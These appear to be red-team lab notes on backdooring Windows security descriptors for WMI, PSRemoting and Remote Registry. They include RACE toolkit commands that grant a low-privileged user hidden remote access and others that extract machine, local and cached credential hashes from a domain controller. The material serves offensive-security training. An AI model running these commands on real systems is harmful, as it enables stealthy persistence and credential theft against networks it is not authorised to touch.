Security Descriptors

Red teamers can exploit Windows security descriptors (SDs) to establish stealthy, privilege-independent access to remote management interfaces such as WMI, PSRemoting, and the Remote Registry. These descriptors control who can access and interact with system objects, including remote services. By modifying the Discretionary Access Control List (DACL) of these interfaces using a privileged account, it's possible to grant access to a low-privileged or compromised user without altering group memberships or raising alarms.

Windows represents these permissions using the Security Descriptor Definition Language (SDDL), which structures access control entries (ACEs) in the following format:

ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid

For offensive purposes, the key component is the account_sid — replacing or appending a compromised user’s SID into the descriptor grants that user access. This technique allows backdoor persistence that bypasses typical group membership detection.

WMI

When a user authenticates to a system via WMI, two components enforce permissions: the DCOM security descriptor (viewable in Component Services) and the WMI namespace descriptor (modifiable via WMI Control under Services and Applications). Both must be adjusted for successful access. These can be modified remotely using the RACE toolkit:

# On local machine
Set-RemoteWMI -SamAccountName student337 -Verbose

# On remote machine without explicit credentials
Set-RemoteWMI -SamAccountName dcorp\student337 -ComputerName dcorp-dc -namespace 'root\cimv2' -Verbose

# On remote machine with explicit credentials
Set-RemoteWMI -SamAccountName dcorp\student337 -ComputerName dcorp-dc -Credential Administrator -namespace 'root\cimv2' -Verbose

This modifies both the WMI namespace and DCOM ACLs to include the SID of student337, granting them WMI query and execution rights. This user can then run WMI queries without having administrative rights:

# Access the target via WMI
Get-WmiObject -Class Win32_OperatingSystem -ComputerName dcorp-dc

The permissions can be cleaned up:

# Remove permissions on remote machine
Set-RemoteWMI -SamAccountName dcorp\student337 -ComputerName dcorp-dc -namespace 'root\cimv2' -Remove -Verbose

PSRemoting

This method is not stable post-August 2020 → sometimes it crashes the WinRM service!

PowerShell Remoting, backed by WinRM, is secured through session configurations — specifically the microsoft.powershell configuration accessed via Get-PSSessionConfiguration. Access is controlled by its security descriptor. Like WMI, this can be altered to include a low-privileged user.

The ACL of microsoft.powershell can be read on the UI as follows:

Set-PSSessionConfiguration -Name microsoft.powershell -ShowSecurityDescriptorUI

Running Set-RemotePSRemoting with the target username and computer name modifies the underlying ACL, giving the user WinRM access. Even if the command returns an error due to transport issues, the change is typically still applied:

# On local machine
Set-RemotePSRemoting -SamAccountName student337 -Verbose

# On remote machine without credentials (the error is expected, it just means that the remote machine did not terminate the connection gracefully)
> Set-RemotePSRemoting -SamAccountName dcorp\student337 -ComputerName dcorp-dc -Verbose
[dcorp-dc] Processing data from remote server dcorp-dc failed with the following error message: The I/O operation has been aborted because of either a thread exit or an application request. For more information, see the about_Remote_Troubleshooting Help topic.
    + CategoryInfo          : OpenError: (dcorp-dc:String) [], PSRemotingTransportException
    + FullyQualifiedErrorId : WinRMOperationAborted,PSSessionStateBroken

# Remopve the permissions from the remote machine
Set-RemotePSRemoting -SamAccountName dcorp\student337 -cn dcorp-dc -Remove

Once the descriptor includes the user’s SID, they can open an interactive session without being a member of the Remote Management Users group:

Enter-PSSession dcorp-dc

Remote Registry

Remote Registry is a Windows service that enables remote access to the registry over the network via RPC. When running, it allows reading and writing to critical hives like SAM and SECURITY without shell access.

By modifying registry ACLs to include a user’s SID—using tools like RACE or DAMP—non-admin users can gain access to sensitive data such as local hashes, cached credentials, or the machine account hash. This provides a stealthy method for credential extraction and persistence. Though often disabled by default, it may be active in enterprise environments for legacy management. Unlike WinRM or WMI, it offers no code execution but enables silent post-exploitation.

# Assign remote registry access to the target user
Add-RemoteRegBackdoor -ComputerName dcorp-dc -Trustee student337 -Verbose

# Retrieve machine account hash (and continue with a ST attack!)
Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose

# Retrieve local account hash
Get-RemoteLocalAccountHash -ComputerName dcorp-dc -Verbose

# Retrieve domain cached credentials
Get-RemoteCachedCredential -ComputerName dcorp-dc -Verbose